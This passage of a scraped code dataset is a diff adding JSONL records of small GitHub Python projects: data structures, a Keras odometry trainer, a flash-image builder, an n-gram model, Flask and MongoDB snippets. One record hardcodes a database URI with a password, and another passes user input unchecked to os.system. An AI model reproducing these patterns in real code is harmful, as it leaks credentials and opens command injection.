diff --git "a/2692.jsonl" "b/2692.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2692.jsonl"
@@ -0,0 +1,1826 @@
+{"seq_id":"3577597038","text":"class Node:\n    def __init__(self,data = None, next=None):\n        self.data = data\n        self.next = next\n\nclass LinkedList:\n    def __init__(self):\n        self.head = None\n\n    def insert_in_beginning(self,data):\n        node = Node(data,self.head)\n        self.head = node\n\n    def print(self):\n\n        if(self.head is None):\n            print(\"The linked list is empty\")\n            return\n\n        itr = self.head\n        llistr = ''\n\n        while itr:\n            llistr += str(itr.data) + '-->'\n            itr = itr.next\n\n        print(llistr)\n\n    def insert_at_end(self,data):\n        # bug fix: when the list is empty, set head and return instead of dereferencing None\n        if self.head is None:\n            self.head = Node(data,None)\n            return\n\n        itr = self.head\n\n        while itr.next:\n            itr = itr.next\n\n        node = Node(data,None)\n        itr.next = node\n\n    def insert_list(self,data_list):\n\n        for val in data_list:\n            self.insert_at_end(val)\n\n    def get_length(self):\n\n        itr = self.head\n        length = 0\n        while itr:\n            length += 1\n            itr = itr.next\n\n        return length\n\n    def remove_at(self,index):\n\n        if index < 0 or index >= self.get_length():\n            print(\"Index out of bound !!\")\n            return\n\n        if index == 0:\n            self.head = self.head.next #remove first element\n            return\n\n        itr = self.head\n        i = 0\n        while i < index-1:\n            i += 1\n            itr = itr.next\n\n        temp = itr.next.next\n        itr.next = temp\n\n        return\n\n    def insert_at(self,index,data):\n\n        # bug fix: allow inserting at index == length (append) and reject only past-the-end indexes\n        if index<0 or index > self.get_length():\n            print(\"Index out of bound!\")\n            return\n\n        if index == 0:\n            self.insert_in_beginning(data)\n            return\n\n        if index == self.get_length():\n            self.insert_at_end(data)\n            return\n\n        itr = self.head\n        count = 0\n\n        while count < index - 1:\n            itr = itr.next\n            count += 1\n\n        node = Node(data,itr.next)\n\n        itr.next = node\n\n        return\n\n\n\n\nif __name__ == '__main__':\n    ll = LinkedList()\n    ll.insert_in_beginning(23)\n    ll.insert_in_beginning(24)\n    ll.insert_at_end(50)\n    ll.insert_at_end(60)\n    ll.insert_list([1,2,3,4,5,6])\n    ll.print()\n    print(ll.get_length())\n    #ll.remove_at(20)\n    ll.insert_at(2,45)\n    ll.insert_at(3,52)\n    ll.print()\n\n","repo_name":"abhirup706/Interview-Prep","sub_path":"linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"31698816688","text":"import argparse\r\nimport keras as K\r\nimport numpy as np\r\nimport os\r\nimport signal\r\nimport sys\r\n\r\nfrom epoch import Epoch\r\nfrom keras.layers import Dense, Activation, MaxPooling2D, Dropout, LSTM, Flatten, merge, TimeDistributed\r\nfrom subseq_preds_to_full_pred import subseq_preds_to_full_pred\r\nfrom time import time\r\n\r\nfrom keras.layers import Concatenate\r\n\r\nfrom keras.layers.convolutional import Conv2D\r\n\r\nap = argparse.ArgumentParser()\r\n\r\nap.add_argument('--batch_size', type=int, default=1)\r\nap.add_argument('--beta', type=int, default=100, help='Weight on orientation loss')\r\nap.add_argument('--data_dir', type=str, default='data/dataset', help='Where KITTI data is stored')\r\nap.add_argument('--hidden_dim', type=int, default=100, help='Dimension of LSTM hidden state')\r\nap.add_argument('--layer_num', type=int, default=2, help='How many LSTM layers to stack')\r\nap.add_argument('--learning_rate', type=float, default=0.001, help='Learning rate for gradient descent optimization')\r\nap.add_argument('--num_epochs', type=int, default=5, help='How many full passes to make over the training data')\r\nap.add_argument('--step_size', type=int, default=10, help='How many optical flow samples to 
skip between subsequences.')\r\nap.add_argument('--subseq_length', type=int, default=50, help='How many optical flow images to include in one subsequence during training. Affects memory consumption.')\r\nap.add_argument('--mode', default = 'train', help=\"train or test. Train produces model checkpoints, test outputs csvs of poses for each testing sequence.\")\r\nap.add_argument('--snapshot_dir', default='snapshots/', help='what folder to store model snapshots in')\r\n\r\nargs = vars(ap.parse_args())\r\n\r\n\r\ndef custom_loss_with_beta(beta):\r\n def weighted_mse(y_true, y_pred):\r\n \"\"\"Custom loss function for jointly learning\r\n position and orientation.\r\n\r\n Args:\r\n y_true: The pose label\r\n y_pred: The estimated pose\r\n\r\n Returns:\r\n L_x + beta*L_q\r\n\r\n Where L_x is the position loss,\r\n L_q is the orientation loss,\r\n and beta is a hyperparameter\r\n \"\"\"\r\n\r\n ### LOSS SO NEW IT WRAPS BACK AROUND TO BEING OLD ###\r\n \r\n squared_diff = K.backend.square(y_pred - y_true)\r\n\r\n y_shape = K.backend.int_shape(squared_diff)\r\n y_shape = (args['batch_size'],) + y_shape[1:]\r\n #print(\"y_shape\")\r\n #print(y_shape)\r\n\r\n weights = np.ones(y_shape)\r\n weights[..., 3:] = beta\r\n weights = K.backend.variable(weights)\r\n\r\n # element-wise multiplication\r\n squared_diff_weighted = squared_diff * weights\r\n\r\n loss = K.backend.mean(squared_diff_weighted, axis=-1)\r\n \r\n\r\n ### NEWER LOSS ###\r\n \"\"\"\r\n diff_abs = K.backend.abs(y_pred - y_true)\r\n\r\n y_shape = K.backend.int_shape(diff_abs)\r\n y_shape = (args['batch_size'],) + y_shape[1:]\r\n print(\"y_shape\")\r\n print(y_shape)\r\n\r\n position_identity = np.zeros(y_shape)\r\n position_identity[..., 0:3] = 1\r\n position_identity = K.backend.variable(position_identity)\r\n\r\n position_diff_abs = diff_abs * position_identity\r\n\r\n orientation_identity = np.zeros(y_shape)\r\n orientation_identity[..., 4:7] = 1\r\n orientation_identity = K.backend.variable(position_identity)\r\n\r\n orientation_diff_abs = diff_abs * orientation_identity\r\n\r\n orientation_diff_abs_other_way = K.backend.variable(np.full(y_shape, 2*np.pi)) - orientation_diff_abs\r\n\r\n orientation_diff_abs_other_way = orientation_diff_abs_other_way * orientation_identity\r\n\r\n orientation_diff_magnitude = K.backend.minimum(orientation_diff_abs,\r\n orientation_diff_abs_other_way)\r\n\r\n # Scale values by beta\r\n orientation_diff_magnitude = orientation_diff_magnitude * np.sqrt(beta)\r\n\r\n combined_diff = position_diff_abs + orientation_diff_magnitude\r\n\r\n loss = K.backend.mean(K.backend.square(combined_diff), axis=-1)\r\n \"\"\"\r\n\r\n ###\r\n ## NEW LOSS WHICH HANDLES ANGLES\r\n ##\r\n \"\"\"\r\n p_true = K.backend.gather(y_true, K.backend.variable(np.array([0,1,2]), dtype='int32'))\r\n p_pred = K.backend.gather(y_pred, K.backend.variable(np.array([0,1,2]), dtype='int32'))\r\n q_true = K.backend.gather(y_true, K.backend.variable(np.array([3,4,5]), dtype='int32'))\r\n q_pred = K.backend.gather(y_pred, K.backend.variable(np.array([3,4,5]), dtype='int32'))\r\n\r\n L_x = K.backend.mean(K.backend.square(p_pred - p_true), axis=-1)\r\n\r\n q_diff_abs = K.backend.abs(q_pred - q_true)\r\n\r\n q_diff_other_way = K.backend.variable(np.full(K.backend.int_shape(q_diff_abs), 2*np.pi)) - q_diff_abs\r\n\r\n q_magnitude = K.backend.minimum(q_diff_abs, q_diff_other_way)\r\n\r\n L_q = K.backend.mean(K.backend.square(q_magnitude), axis=-1)\r\n\r\n loss = L_x + beta * L_q\r\n \"\"\"\r\n ####\r\n ###OLD LOSS\r\n ####\r\n \"\"\"\r\n # Take the 
difference of each pose label and its estimate,\r\n # and square that element-wise\r\n squared_diff = K.backend.square(y_pred - y_true)\r\n\r\n # Multiply the orientations by beta, and sum\r\n # each tensor up\r\n weights = K.backend.variable(np.array([1,1,1,beta,beta,beta]))\r\n loss = K.backend.squeeze(K.backend.dot(squared_diff, K.backend.expand_dims(weights)), axis=-1)\r\n \"\"\"\r\n return loss\r\n return weighted_mse \r\n\r\n# Separate the sequences for which there is ground truth into test \r\n# and train according to the paper's partition. \r\ntrain_seqs = ['00', '02', '08', '09'] \r\ntest_seqs = ['03', '04', '05', '06', '07', '10']\r\n\r\n# Create a data loader to get batches one epoch at a time\r\nepoch_data_loader = Epoch(datadir=args['data_dir'],\r\n flowdir=os.path.join(args['data_dir'], \"flows\"),\r\n train_seq_nos=train_seqs,\r\n test_seq_nos=test_seqs,\r\n window_size=args['subseq_length'],\r\n step_size=args['step_size'],\r\n batch_size=args['batch_size'])\r\n\r\n# What is the shape of the input flow images?\r\nflow_input_shape = epoch_data_loader.get_input_shape()\r\n\r\n# Define Keras model architecture\r\nmodel = K.models.Sequential()\r\n\r\n# Reducing input dimensions via conv-pool layers\r\nmodel.add(TimeDistributed(Conv2D(10,(3,3)),\r\n input_shape=(args[\"subseq_length\"], *flow_input_shape)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(TimeDistributed(MaxPooling2D(data_format=\"channels_first\",\r\n pool_size=(7, 7))))\r\n\r\nmodel.add(TimeDistributed(Conv2D(10,(3,3))))\r\nmodel.add(Activation('relu'))\r\nmodel.add(TimeDistributed(MaxPooling2D(data_format=\"channels_first\",\r\n pool_size=(5, 5))))\r\n\r\nmodel.add(TimeDistributed(Conv2D(10,(3,3))))\r\nmodel.add(Activation('relu'))\r\nmodel.add(TimeDistributed(MaxPooling2D(data_format=\"channels_first\",\r\n pool_size=(5, 5))))\r\n\r\nmodel.add(TimeDistributed(Conv2D(10,(3,3))))\r\nmodel.add(Activation('relu'))\r\nmodel.add(TimeDistributed(MaxPooling2D(data_format=\"channels_first\",\r\n pool_size=(3, 3))))\r\n\r\n# Flatten outputs for input to LSTM\r\nmodel.add(TimeDistributed(Flatten()))\r\n\r\n# Stacked LSTM layers\r\nfor i in range(args['layer_num']):\r\n model.add(LSTM(args['hidden_dim'], return_sequences=True))\r\n\r\n# A single dense layer to convert the LSTM output into\r\n# a pose estimate vector of length 6. 
We use the default\r\n# linear activation because pose position values can be\r\n# unbounded.\r\nmodel.add(TimeDistributed(Dense(6)))\r\n\r\n\r\n# Compile the model, with custom loss function\r\nmodel.compile(loss=custom_loss_with_beta(beta=args['beta']),\r\n optimizer=K.optimizers.Adam(lr=args['learning_rate']))\r\n#model.compile(loss = \"mse\", optimizer = \"adam\")\r\n\r\n# Describe layers and parameters\r\nprint(\"Model summary:\")\r\nprint(model.summary())\r\n\r\n# Set where weights and optimizer state are saved and loaded from\r\nsnapshot_path = os.path.join(args['snapshot_dir'],\r\n\t\t\t 'model.h5')\r\n\r\n# Load snapshot if it exists\r\nif os.path.isfile(snapshot_path):\r\n print(\"Loading snapshot found at {}\".format(snapshot_path))\r\n model = K.models.load_model(snapshot_path, custom_objects={'weighted_mse': custom_loss_with_beta(beta=args['beta'])})\r\nelse:\r\n # We can't test the network if we haven't already trained it\r\n if args['mode'] == 'test':\r\n print(\"ERROR: Trying to test network but snapshot file {} not found.\".format(snapshot_path))\r\n sys.exit()\r\n\r\n# Create TensorBoard\r\ntensorboard = K.callbacks.TensorBoard(\r\n log_dir=\"logs/{}\".format(time()),\r\n update_freq='batch')\r\n\r\n# Attach it to our model\r\ntensorboard.set_model(model)\r\n\r\n# Create signal handler to catch Ctrl-C\r\n# and save model before shutdown\r\ndef signal_handler(sig, frame):\r\n model.save(snapshot_path)\r\n sys.exit(0)\r\nsignal.signal(signal.SIGINT, signal_handler)\r\n\r\nif args['mode'] == 'train':\r\n batch_num = 0\r\n for epoch in range(args['num_epochs']):\r\n\r\n # Test loss\r\n testing_losses = []\r\n #while not epoch_data_loader.testing_is_complete():\r\n for i in range(30):\r\n\r\n # temp solution because testing loss calculation\r\n # is taking too long\r\n if epoch_data_loader.testing_is_complete():\r\n continue\r\n\r\n # Get batch of random samples (subsequences)\r\n # from held-out KITTI sequences\r\n X, Y = epoch_data_loader.get_testing_batch()\r\n\r\n # Get testing loss on this batch\r\n loss = model.test_on_batch(X, Y)\r\n\r\n # Store loss for mean\r\n testing_losses.append(loss)\r\n\r\n # Calculate average loss across test set\r\n mean_test_loss = np.mean(testing_losses)\r\n\r\n # Some console lovin\r\n print(\"[Epoch {}] TESTING LOSS: {}\".format(epoch,\r\n mean_test_loss))\r\n\r\n # Write test loss to tensorboard\r\n tensorboard.on_batch_end(batch_num,\r\n dict(validation_loss=mean_test_loss,\r\n size=1))\r\n\r\n # Train loss\r\n training_losses = []\r\n while not epoch_data_loader.training_is_complete():\r\n\r\n # Get batch of random samples (subsequences)\r\n X, Y = epoch_data_loader.get_training_batch()\r\n\r\n # Update weights, and get training loss on this batch\r\n loss = model.train_on_batch(X, Y)\r\n\r\n # Store loss\r\n training_losses.append(loss)\r\n\r\n # Some console lovin\r\n print(\"[Epoch {} Batch {}] TRAINING LOSS: {}\".format(epoch,\r\n batch_num,\r\n loss))\r\n\r\n # save loss history for this batch\r\n # on_batch_end doesn't work!? using on_epoch_end temporarily\r\n tensorboard.on_batch_end(batch_num, dict(training_loss=loss,\r\n size=1))\r\n batch_num += 1\r\n\r\n\r\n # Calculate average loss of all samples this epoch\r\n mean_train_loss = np.mean(training_losses)\r\n\r\n print(\"Epoch {} finished. 
AVG TRAINING LOSS: {}\".format(epoch,\r\n mean_train_loss))\r\n\r\n # save loss history with tensorboard at the end of each epoch\r\n #tensorboard.on_epoch_end(epoch, dict(epoch_training_loss=mean_train_loss))\r\n\r\n # Re partition and shuffle samples\r\n epoch_data_loader.reset()\r\n\r\n\r\n # Once we're done with training, save the model\r\n print(\"TRAINING FINISHED. SAVING SNAPSHOT TO {}\".format(snapshot_path))\r\n model.save(snapshot_path)\r\n\r\n # And tell tensorboard\r\n tensorboard.on_train_end(None)\r\n\r\nelif args['mode'] == 'test':\r\n\r\n for kitti_seq in test_seqs:\r\n\r\n # Open output file to write pose results to\r\n out_fname = \"test_results/{}.csv\".format(kitti_seq)\r\n\r\n losses = []\r\n estimated_poses = []\r\n for X, Y in epoch_data_loader.get_testing_samples(kitti_seq):\r\n\r\n # batch size of 1\r\n X = X[np.newaxis, :]\r\n\r\n #print(\"TESTING X SIZE = {}\".format(X.shape))\r\n\r\n # get pose estimate\r\n estimated_batch = model.predict_on_batch(X)\r\n\r\n # TODO: Fix this to be more general for different batch sizes\r\n estimated_pose = estimated_batch[0]\r\n\r\n estimated_poses.append(estimated_pose)\r\n\r\n\r\n # Get testing loss\r\n Y = Y[np.newaxis, :] # batch size of 1\r\n loss = model.test_on_batch(X, Y)\r\n #print(\"TESTING LOSS: {}\".format(loss))\r\n losses.append(loss)\r\n\r\n # Calculate average loss of this sequence\r\n mean_seq_loss = np.mean(losses)\r\n\r\n print(\"Testing sequence {} finished. AVG TEST LOSS: {}\".format(\\\r\n kitti_seq,\r\n mean_seq_loss))\r\n\r\n # Put poses back in original reference frame\r\n # and write out to file\r\n subseq_preds_to_full_pred(estimated_poses, out_fname)\r\n\r\n # save loss history with tensorboard at the end of each sequence\r\n #tensorboard.on_epoch_end(epoch, dict(testing_loss=mean_loss))\r\n\r\nelse:\r\n print(\"ERROR: Mode {} not recognized\".format(args['mode']))\r\n\r\n","repo_name":"NoahRJohnson/deepVO","sub_path":"src/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":13682,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"75"} +{"seq_id":"40116738673","text":"# 英大文字の文字列が入力されます。\n# 文字列の先頭1文字が、末尾1文字よりもアルファベット順で先に出現するならば、\"true\"を出力し、そうでなければ\"false\"を出力してください。\n\ns = input()\nif s[0] < s[-1]:\n print(\"true\")\nelse:\n print(\"false\")\n\n\n# Python3では文字列strはUnicodeであり、文字列の大小関係(順番)は文字のUnicodeコードポイント(文字コード)で判定される。\n\n\n# 解答2\nstring = input()\nalphabets = [\n \"A\",\n \"B\",\n \"C\",\n \"D\",\n \"E\",\n \"F\",\n \"G\",\n \"H\",\n \"I\",\n \"J\",\n \"K\",\n \"L\",\n \"M\",\n \"N\",\n \"O\",\n \"P\",\n \"Q\",\n \"R\",\n \"S\",\n \"T\",\n \"U\",\n \"V\",\n \"W\",\n \"X\",\n \"Y\",\n \"Z\",\n]\nresult = \"true\"\n\nfirst = string[0]\nlast = string[len(string) - 1]\n\nfor alphabet in alphabets:\n if first == alphabet:\n break\n\n if last == alphabet:\n result = \"false\"\n\nprint(result)","repo_name":"kanp7/paiza","sub_path":"Python/rankB_Up/AlphabetSearch/step3.py","file_name":"step3.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19915591723","text":"import pymongo\n\n\nclass MongoDB:\n def __init__(self):\n pass\n\n def mongoConnect(self):\n Mongo_URI = \"mongodb+srv://m001-student:123asterisco@sandbox.kvjof.mongodb.net/myFirstDatabase?retryWrites=true&w=majority\"\n try:\n self.cliente = pymongo.MongoClient(Mongo_URI)\n self.cliente.server_info()\n return \"Conexion a MongoDB Exitosa\"\n except 
pymongo.errors.ConnectionFailure as errorConexion:\n            self.cliente = pymongo.MongoClient('localhost', 27017)\n            self.cliente.server_info()\n            # bug fix: the local fallback also needs to return a status message\n            return \"Conexion local a MongoDB exitosa\"\n\n    def insertData(self, data):\n        try:\n            self.mydb = self.cliente['adonis']\n            self.tabla = self.mydb['people']\n            self.datosIns = self.tabla.insert_one(data)\n            return \"Datos insertados a MongoDB\"\n        except Exception:\n            return \"No se insertado\"\n","repo_name":"GabrielRuiseco19170012/OrionPy","sub_path":"MongoDB.py","file_name":"MongoDB.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"27875137702","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\n\nfrom make import make_args, make_builddir, make_platform\n\nBIOS_SIZE = 0x8000\n\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"SPI Flash contents tool\")\n    make_args(parser)\n\n    parser.add_argument(\"--override-gateware\")\n    parser.add_argument(\"--override-bios\")\n    parser.add_argument(\"--override-firmware\")\n\n    args = parser.parse_args()\n\n    builddir = make_builddir(args)\n    gateware = os.path.join(builddir, \"gateware\", \"top.bin\")\n    if args.override_gateware:\n        if args.override_gateware.lower() == \"none\":\n            gateware = None\n        else:\n            gateware = args.override_gateware\n    if gateware:\n        assert os.path.exists(gateware), (\n            \"Gateware file not found! \"\n            \"Use --override-gateware=none for no gateware.\")\n\n    bios = os.path.join(builddir, \"software\", \"bios\", \"bios.bin\")\n    if args.override_bios:\n        if args.override_bios.lower() == \"none\":\n            bios = None\n        else:\n            bios = args.override_bios\n    if bios:\n        assert os.path.exists(bios), (\n            \"BIOS file not found! \"\n            \"Use --override-bios=none for no BIOS.\")\n\n    firmware = os.path.join(builddir, \"software\", \"firmware\", \"firmware.fbi\")\n    if args.override_firmware:\n        if args.override_firmware.lower() == \"none\":\n            firmware = None\n        else:\n            firmware = args.override_firmware\n    if firmware:\n        assert os.path.exists(firmware), (\n            \"Firmware file not found! 
\"\n \"Use --override-firmware=none for no firmware.\")\n\n platform = make_platform(args)\n\n gateware_pos = 0\n bios_pos = platform.gateware_size\n firmware_pos = platform.gateware_size + BIOS_SIZE\n\n output = os.path.join(builddir, \"flash.bin\")\n print()\n with open(output, \"wb\") as f:\n # FPGA gateware\n if gateware:\n gateware_data = open(gateware, \"rb\").read()\n else:\n gateware_data = b\"\"\n gateware = \"Skipped\"\n\n print((\"Gateware @ 0x{:08x} ({:10} bytes) {:60}\"\n \" - Xilinx FPGA Bitstream\"\n ).format(gateware_pos, len(gateware_data), gateware))\n print(\" \".join(\"{:02x}\".format(i) for i in gateware_data[:64]))\n assert len(gateware_data) < platform.gateware_size\n f.seek(0)\n f.write(gateware_data)\n\n if bios:\n bios_data = open(bios, \"rb\").read()\n else:\n bios_data = b\"\"\n bios = \"Skipped\"\n\n # LiteX BIOS\n assert len(bios_data) < BIOS_SIZE\n f.seek(bios_pos)\n f.write(bios_data)\n print((\" BIOS @ 0x{:08x} ({:10} bytes) {:60}\"\n \" - LiteX BIOS with CRC\"\n ).format(bios_pos, len(bios_data), bios))\n print(\" \".join(\"{:02x}\".format(i) for i in bios_data[:64]))\n\n if firmware:\n firmware_data = open(firmware, \"rb\").read()\n else:\n firmware_data = b\"\"\n firmware = \"Skipped\"\n\n # SoftCPU firmware\n print((\"Firmware @ 0x{:08x} ({:10} bytes) {:60}\"\n \" - HDMI2USB Firmware in FBI format (loaded into DRAM)\"\n ).format(firmware_pos, len(firmware_data), firmware))\n print(\" \".join(\"{:02x}\".format(i) for i in firmware_data[:64]))\n f.seek(firmware_pos)\n f.write(firmware_data)\n\n # Result\n remain = platform.spiflash_total_size - (\n firmware_pos+len(firmware_data))\n print(\"-\"*40)\n print((\" Remaining space {:10} bytes\"\n \" ({} Megabits, {:.2f} Megabytes)\"\n ).format(remain, int(remain*8/1024/1024), remain/1024/1024))\n total = platform.spiflash_total_size\n print((\" Total space {:10} bytes\"\n \" ({} Megabits, {:.2f} Megabytes)\"\n ).format(total, int(total*8/1024/1024), total/1024/1024))\n\n print()\n print(\"Flash image: {}\".format(output))\n flash_image_data = open(output, \"rb\").read()\n print(\" \".join(\"{:02x}\".format(i) for i in flash_image_data[:64]))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mithro/HDMI2USB-litex-firmware-old","sub_path":"mkimage.py","file_name":"mkimage.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"7156332610","text":"import os\nimport collections\nimport json\nfrom lib.util import CONST_END_WORD\nfrom lib.util import sliding, ngramWindow\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass NGramModel(object):\n def __init__(self, windowSizeList, generatePdf=False, filters=[]):\n self.windowSizeList = windowSizeList\n self.ngramCount = {}\n self.ntotalCounts = {}\n self.ngramDomainTopicDict = {}\n self.nGramPdf = {}\n self.nGramProb = {}\n self.baseDir = None\n self.domainList = []\n self.filters = filters\n self.vocabSize = 0\n self.kSmoothingFactor = 0.00001\n self.generatePdf = generatePdf\n #self.kSmoothingFactor = 0.0001\n\n def _getVocabSize(self):\n if 1 in self.windowSizeList:\n self.vocabSize = sum([wordCount for _, wordCount in self.ngramCount[1].items()])\n else:\n self._count([1])\n self.vocabSize = sum([wordCount for _, wordCount in self.ngramCount[1].items()])\n\n def _count(self, windowSizeList, generatePdf=False):\n for wSize in windowSizeList:\n ngramCount = collections.Counter()\n ntotalCounts = collections.Counter()\n for domain in 
self.domainList:\n dataDir = os.path.join(self.baseDir, domain)\n for (currDir, _, fileList) in os.walk(dataDir):\n for filename in fileList:\n\n if 'all' not in self.filters:\n skipFile = True\n for fl in self.filters:\n if fl in filename:\n skipFile = False\n break\n\n if skipFile:\n continue\n\n if filename.endswith('.json'):\n fullName = os.path.join(currDir, filename)\n #logger.info(\"filename : %s\" % fullName)\n with open(fullName, \"r\") as f:\n cData = json.load(f)\n articleText = cData.get(\"article\", None)\n domain = cData.get(\"domain\", None)\n topic = cData.get(\"theme\", None)\n domainTopicKey = (domain, topic)\n if not articleText:\n logger.debug(\"%s skipped\" % filename)\n continue\n\n textList = articleText.strip().split(\" \")\n # Update vocab size\n logger.debug(\"textList : %s\" % textList)\n ngramList = [ngramWindow(wordSeg, wSize) for wordSeg in sliding(textList, wSize)]\n # Add last words\n prevWord = list(ngramList[-1])\n lastWord = prevWord[1:] + [CONST_END_WORD]\n ngramList.append(tuple(lastWord))\n\n if generatePdf:\n for ngram in ngramList:\n ngramKey = ngram[:-1]\n if ngramKey not in self.ngramDomainTopicDict:\n self.ngramDomainTopicDict[ngramKey] = [domainTopicKey]\n continue\n\n self.ngramDomainTopicDict[ngramKey].append(domainTopicKey)\n\n ngramCount.update(ngramList)\n if wSize != 1:\n ntotalCounts.update([x[:-1] for x in ngramList])\n\n self.ngramCount[wSize] = ngramCount\n if wSize != 1:\n self.ntotalCounts[wSize] = ntotalCounts\n\n def _nGramProb(self):\n vSizeFraction = self.kSmoothingFactor * float(self.vocabSize)\n for wSize in self.windowSizeList:\n nGramProb = collections.defaultdict(float)\n nGramPdf = {}\n for ngram in self.ngramCount[wSize]:\n ngramCount = self.ngramCount[wSize][ngram]\n if wSize != 1:\n totalCount = self.ntotalCounts[wSize][ngram[0:-1]]\n else:\n totalCount = self.vocabSize\n\n #if self.generatePdf:\n # ngramKey = ngram[:-1]\n # if ngramKey not in self.nGramPdf:\n # nGramPdf[ngramKey] = [(float(ngramCount) / totalCount, ngram[-1])]\n # continue\n #\n # nGramPdf[ngramKey].append((float(ngramCount) / totalCount, ngram[-1]))\n\n if self.generatePdf:\n ngramKey = ngram[:-1]\n for domainTopicKey in self.ngramDomainTopicDict.get(ngramKey, []):\n if ngramKey not in self.nGramPdf:\n nGramPdf[ngramKey] = {domainTopicKey: [(float(ngramCount) / totalCount, ngram[-1])]}\n continue\n\n if domainTopicKey not in self.nGramPdf[ngramKey]:\n nGramPdf[ngramKey][domainTopicKey] = [(float(ngramCount) / totalCount, ngram[-1])]\n\n nGramPdf[ngramKey][domainTopicKey].append((float(ngramCount) / totalCount, ngram[-1]))\n\n #self.nGramProb[ngram] += float(ngramCount) / totalCount\n nGramProb[ngram] += (float(ngramCount) + self.kSmoothingFactor) / (vSizeFraction + totalCount)\n\n self.nGramProb[wSize] = nGramProb\n self.nGramPdf[wSize] = nGramPdf\n\n def countNgrams(self, domainList, baseDir=\".\"):\n self.baseDir = baseDir\n self.domainList = domainList\n logger.debug(\"get count\")\n self._count(self.windowSizeList, self.generatePdf)\n logger.debug(\"get vocab size\")\n self._getVocabSize()\n\n def generateModel(self):\n self._nGramProb()\n return self.nGramPdf\n\n","repo_name":"arashjamalian/cs221_ngramModel","sub_path":"models/ngram_model.py","file_name":"ngram_model.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31208948782","text":"#AUTOR: KEYTEL PUMAYLLE RAMIREZ \r\n#Librerias\r\nimport socket\r\nimport ftplib\r\nfrom os import 
system\r\nfrom time import sleep\r\n\r\n# Server details\r\nhostname = socket.gethostname()\r\nip_servidor = socket.gethostbyname(hostname)\r\nprint(\"http:////archivo_descargar>\")\r\nprint(\"Ip_servidor: \"+ip_servidor)\r\n\r\n# Change into the directory that holds the file\r\nprint(\"Ingrese el disco (C:, G:, E:, ...): \")\r\nletra_disco = str(input())\r\n\r\nprint(\"Ingrese la ruta de la carpeta: \")\r\nruta_archivo = input()\r\n\r\n\r\n\r\n\r\n# Start the server\r\nprint(\"IDesea levantar el servidor: \")\r\ncondicion = input()\r\n\r\nif condicion == 's':\r\n    print(\"Levantando servidor...\")\r\n    system(letra_disco)\r\n    sleep(1)\r\n    system(\"cd \"+ ruta_archivo)\r\n    sleep(5)\r\n    system(\"python -m http.server\")\r\nelse:\r\n    print(\"Servidor caido\")","repo_name":"keytelpumaylle/transferencia-archivos-ftp-python","sub_path":"transfer-file-ftp.py","file_name":"transfer-file-ftp.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
+{"seq_id":"23567874734","text":"class Solution:\n    \"\"\"\n    [Easy] Verify Max Heap solution from binarysearch.com\n    Problem is about verifying that the input list represents a max heap, that is\n    for each i:\n        nums[i] >= nums[2 * i + 1]\n    and\n        nums[i] >= nums[2 * i + 2]\n    Time complexity: O(n)\n    Space complexity: O(1)\n    \"\"\"\n    def solve(self, nums) -> bool:\n        for i in range(len(nums)):\n            left = 2 * i + 1\n            right = 2 * i + 2\n            if left < len(nums) and nums[i] < nums[left]:\n                return False\n            if right < len(nums) and nums[i] < nums[right]:\n                return False\n            # early break\n            if right >= len(nums):\n                break\n        return True","repo_name":"jam231/binarysearch","sub_path":"verify-max-heap/python/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"18735843805","text":"import sys\nsys.path.append('con_4/games')\nfrom game_1 import Con4\nfrom comp_plr import *\nfrom rand_plr import Row3\n\n'''\nresults = {1: 0, 2: 0, 'Tie': 0}\n\nplayers = [TreePlayerHeuristic(4), Row3()]\ngame = Con4(players)\ngame.run_to_completion()\nresults[game.winner]+= 1\nprint(results)\n\n\n'''\ntests = 20\nresults = {1: 0, 2: 0, 'Tie': 0}\n#print('\\n\\n')\nfor loop in range(tests) :\n    print(loop)\n    players = [HeuristicStrat(4), Row3()]\n    game = Con4(players)\n    game.run_to_completion()\n    results[game.winner]+= 1\n\nprint(results)\nprint('Percentage Won by Heuristic (4) Plr:', results[1]/tests)\nprint('Percentage Won by Row3 Plr:', results[2]/tests)\nprint('Percentage of Cats Games:', results['Tie']/tests)\n#'''\n\n","repo_name":"snowthesprite/games","sub_path":"con_4/test_game_1.py","file_name":"test_game_1.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"8848305028","text":"from flask import Flask, escape, request, render_template \nimport requests \nimport json\nimport random\n\napp = Flask(__name__)\n\n@app.route('/')\n\ndef hello():\n    name = request.args.get(\"name\",\"World\")\n    return f'Hello, {escape(name)}!'\n\n@app.route('/myname')\ndef myname():\n    return '양시영입니다'\n\n# Random lunch menu recommendation server\n@app.route('/lunch')\ndef lunch():\n    menus = ['양자강','김밥카페','20층','순남시래기']\n    lunch = random.choice(menus)\n    return lunch\n\n# Idol encyclopedia\n@app.route('/idol')\ndef idol():\n    idols = {\n        'bts' :\n        {\n            '지민' : 25,\n            'RM' : 23,\n        },\n        'rv' : '레드벨벳',\n        '핑클' : \n        {\n            '이효리' : '거꾸로 해도 이효리',\n            '옥주현' : 
